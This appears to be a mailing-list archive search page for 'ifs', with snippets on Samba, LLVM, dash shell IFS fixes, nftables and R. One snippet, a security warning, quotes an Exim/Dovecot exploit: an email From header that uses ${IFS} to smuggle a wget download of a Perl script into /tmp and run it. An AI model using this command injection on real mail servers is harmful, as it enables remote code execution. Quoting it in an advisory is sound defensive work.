search for: ifs

Displaying 20 results from an estimated 474 matches for "ifs".

Did you mean: if
2003 Aug 25
6
PDC + LDAP + W2K-SP4 Domain logon
...equest to *SMBSERVER failed (Called name not present) NetBIOS over TCP disabled -- no workgroup available </snip> *quite strange error since it returns the shares?! ---> going on anyway ---> at client side(w2k): - login on client with local administrator-account. - browsing network IFS results in seeing only the windows-2000 machines in the network and NOT the samba PDC. - if I attempt to connect to '\\<my samba pdc>' I do get a request for my login and password. Login works and I can browse shares. - I use 'net use * /d /yes' to be able to join the do...
2017 Aug 04
4
BranchProbability/BlockFrequency for a chain of ifs
...' bodies. So each if body merges to a slightly different spot than the not taken side of the final if. In my specific case there are really 8 specific range checks. Without profile data it seems branch probability assumes the branch of each 'if' has 50% probability. Due to the way the ifs are cascaded this causes block frequency to think the final 'if' body can only execute some really small percentage of the time. Similarly it thinks that less than %1 of the time will we enter the code path that occurs if none of the ifs are taken. In reality in my specific case we end up...
2019 Jan 25
0
[klibc:update-dash] builtin: Fix handling of trailing IFS white spaces
...commit;h=9c83a988fbbacc54bdf700ffc94c5420beb14909 Author: Herbert Xu <herbert at gondor.apana.org.au> AuthorDate: Sun, 12 Jun 2016 20:17:48 +0800 Committer: Ben Hutchings <ben at decadent.org.uk> CommitDate: Fri, 25 Jan 2019 02:57:21 +0000 [klibc] builtin: Fix handling of trailing IFS white spaces The read built-in does not handle trailing IFS white spaces in the right way, when there are more fields than variables. Part of the problem is that this case is handled outside of ifsbreakup. Harald van Dijk wrote a patch to fix this by moving the magic into ifsbreakup itself. Thi...
2020 Mar 28
0
[klibc:update-dash] dash: builtin: Fix handling of trailing IFS white spaces
...;h=5d0e205c474c4df839f92663457acc991d867c25 Author: Herbert Xu <herbert at gondor.apana.org.au> AuthorDate: Sun, 12 Jun 2016 20:17:48 +0800 Committer: Ben Hutchings <ben at decadent.org.uk> CommitDate: Sat, 28 Mar 2020 21:42:54 +0000 [klibc] dash: builtin: Fix handling of trailing IFS white spaces [ dash commit 0e4c9599468ab102e6a612439db6df0248410483 ] The read built-in does not handle trailing IFS white spaces in the right way, when there are more fields than variables. Part of the problem is that this case is handled outside of ifsbreakup. Harald van Dijk wrote a patch to...
2001 Dec 30
1
ifs estimator
Hy all, I have written a small library that provide a new distribution function estimator based on IFS (that are essentially fractals). I would be pleased if any of you can build hte library for Unix-type machines and Windows implementations with the included makefiles as a Mac library is already working. As I'm not able to test these platforms any modification to makefiles is welcome. I ha...
2020 Mar 28
0
[klibc:update-dash] dash: var: Set IFS to fixed value at start time
.../klibc/klibc.git;a=commit;h=6dc1db1bce863f0e0e0abda1b9a58d8cb22863ca Author: Herbert Xu <herbert at gondor.apana.org.au> AuthorDate: Sat, 19 May 2018 02:39:43 +0800 Committer: Ben Hutchings <ben at decadent.org.uk> CommitDate: Sat, 28 Mar 2020 21:42:55 +0000 [klibc] dash: var: Set IFS to fixed value at start time [ dash commit 6458796c79e643503d14e18c611cfbf68c4a8cce ] This patch forces the IFS variable to always be set to its default value, regardless of the environment. It also removes the long unused IFS_BROKEN code. Signed-off-by: Herbert Xu <herbert at gondor.apana.o...
2013 Jun 09
1
from ISC: Exim/Dovecot exploit making the rounds
One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this: From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com (Obviously edited for your safety, and I didn't post the whole thing.) This is an exploit against Dovecot that is using the feature "use_shell" against itself. This feature, unfortunately, is found in...
2019 Jul 25
3
[Bug 1358] New: Error when atomically replacing rules with symbolic variables
...orter: gdouezangrard at gmail.com Created attachment 567 --> https://bugzilla.netfilter.org/attachment.cgi?id=567&action=edit master compilation log OS: Arch Linux Kernel: Linux 5.2.2-arch1-1-ARCH nftables: v0.9.1 With the following `/etc/nftables.conf` file: #!/sbin/nft -f define ifs = {lo} table inet filter { chain input { type filter hook input priority 0; policy drop; } } inet filter input iifname $ifs accept The atomic rule replacement gives the following error: $ nft flush ruleset ';' include '"/etc/nftables.conf"' In f...
2019 Jan 25
0
[klibc:update-dash] [EXPAND] Split unquoted $@/$* correctly when IFS is set but empty
...f24ffa8f0b9d90e29d6daf77e5349dd3ffe4aec Author: Herbert Xu <herbert at gondor.apana.org.au> AuthorDate: Wed, 8 Oct 2014 15:24:23 +0800 Committer: Ben Hutchings <ben at decadent.org.uk> CommitDate: Fri, 25 Jan 2019 02:57:21 +0000 [klibc] [EXPAND] Split unquoted $@/$* correctly when IFS is set but empty Currently we do not field-split $@/$* when it isn't quoted and IFS is set but empty. This is obviously wrong. This patch fixes this. Signed-off-by: Herbert Xu <herbert at gondor.apana.org.au> Signed-off-by: Ben Hutchings <ben at decadent.org.uk> --- usr/dash/e...
2020 Mar 28
0
[klibc:update-dash] dash: [EXPAND] Split unquoted $@/$* correctly when IFS is set but empty
...0fe5a997d8bbd5048b229d655e6549ced Author: Herbert Xu <herbert at gondor.apana.org.au> AuthorDate: Wed, 8 Oct 2014 15:24:23 +0800 Committer: Ben Hutchings <ben at decadent.org.uk> CommitDate: Sat, 28 Mar 2020 21:42:54 +0000 [klibc] dash: [EXPAND] Split unquoted $@/$* correctly when IFS is set but empty [ dash commit 3c06acdac0b1ba0e0acdda513a57ee6e31385dce ] Currently we do not field-split $@/$* when it isn't quoted and IFS is set but empty. This is obviously wrong. This patch fixes this. Signed-off-by: Herbert Xu <herbert at gondor.apana.org.au> Signed-off-by: Ben...
2003 Aug 11
1
Memory-problem?
Hi, I have a big problem with my R-script. It seems to be a memory problem, but I'm not sure. My script: test.window <- function(stat, some arguments){ several ifs and ifs in ifs (if(){...if(){...}}) } ... for (ii in 1 : length(data)){ ## data is a vector of length 2500 stat <- test.window( some arguments ) ## there are 15 arguments including a "big" list (stat), vectors and scalars plot.points(stat, some other arguments) } If I...
2006 Jan 10
0
Lots of IFs in /proc/net/dev
I have a domU configured with two virtual ethernet interfaces - one on a private bridge and one to the outside world. If I cat /proc/net/dev (or loop round the interfaces using SIOCGIFNAME) there are loads of them? Should they all be there ? I''m using the same kernel for dom0 & domU. Inter-| Receive | Transmit face |bytes
2011 Jul 29
0
[PATCH node] Add debugging info to dracut plugin
...n 0 fi @@ -50,6 +55,7 @@ fi # sdc and sdd as part of AppVG # Since we only care which disks are being used, change to a single list storage_init="$(echo "$storage_init" | sed 's/;/,/')" +info "Replaced all ';' with ',' : $storage_init" oldIFS=$IFS @@ -57,14 +63,17 @@ lvm pvscan 2>/dev/null IFS="," for dev in "$storage_init"; do device=$(IFS=$oldIFS parse_disk_id "$dev") + info "After parsing \"$dev\", we got \"$device\"" echo "Wiping LVM from device: ${d...
2006 Feb 07
0
About two IFs with the same IP and the multipath
Hi there, I''m trying to achieve the classic load balancing using the multipath. The gateways are: A (tunl0) and B (tunl1) This is the classical situation covered by the HOWTO: one computer with two Internet connections. The problems come when I try to use the same IPs for both A and B. So A is 10.229.25.8 and B 10.229.25.8. I cannot do otherwise, I''m forced to use the
2003 Feb 20
0
Netbios name service forwarding.
...ude <net/if.h> #include <arpa/inet.h> #define NETBIOSPORT 137 typedef struct iface_struct { struct iface_struct *next; char *name; int fd; struct sockaddr_in me; struct sockaddr_in nmbd; struct sockaddr_in bcast; struct sockaddr_in addr_cache[0x10000]; } *iface; iface ifs; void open_if (char *name, int nb_port, int dm_port) { struct sockaddr_in me = { 0 }; iface i = (iface) malloc (sizeof (struct iface_struct)); int fd; int one = 1; int j; struct ifreq ifr = { 0 }; bzero (i, sizeof (struct iface_struct)); i->name = strdup (name); i->fd...
2005 Dec 23
0
[LLVMdev] if's to switch transformation?
On Fri, 23 Dec 2005, Eric van Riet Paap wrote: > I few days ago I had some code (for the PyPy project) that llc -march=c > converted to a switch statement and gcc compiled that nicely to a jumptable > in the .s file. Now I try to reproduce when directly going from a .ll to a .s > file. But I now see a long list of compare and jumps instead of the > jumptable. Is there a
2006 Jun 21
3
Time Based Goto Ifs Act Strange?
Hi, I'm still in the process of debugging this, but I have a gotoif statement that looks like this: exten => 26,1,GotoIfTime(7:00-18:00|mon-fri|*|*?ext-queues,210,1) exten => 26,n,Goto(ext-local,${VM_PREFIX}127,1) I have others setup the same way that also seem to have the same 'issue'. The issue is that they work, but they seem to require (and I don't understand why) a
1999 Dec 09
0
xauth location in openssh-1.2pre17
...;6 +else + case "$xauth_path" in + /*) + ac_cv_path_xauth_path="$xauth_path" # Let the user override the test with a path. + ;; + ?:/*) + ac_cv_path_xauth_path="$xauth_path" # Let the user override the test with a dos path. + ;; + *) + IFS="${IFS= }"; ac_save_ifs="$IFS"; IFS=":" + ac_dummy="$PATH" + for ac_dir in $ac_dummy; do + test -z "$ac_dir" && ac_dir=. + if test -f $ac_dir/$ac_word; then + ac_cv_path_xauth_path="$ac_dir/$ac_word" + break +...
2005 Dec 23
2
[LLVMdev] if's to switch transformation?
hello everyone, I few days ago I had some code (for the PyPy project) that llc - march=c converted to a switch statement and gcc compiled that nicely to a jumptable in the .s file. Now I try to reproduce when directly going from a .ll to a .s file. But I now see a long list of compare and jumps instead of the jumptable. Is there a transformation that does this if->switch(ing) or is
2011 Mar 11
2
Ifs in formula
Dear r-helpers, This might be an elementary question, but I have a hard time getting my head around it, so all help is much appreciated. I am working on a nonlinear regression model of the form if z > 0 y = f1(x,y), else y = f2(x,t) . In other words, the functional form of f(.) changes according to some criteria z. Natural approach would be to fit two models, i.e. model1 <- nlm(y ~ ...,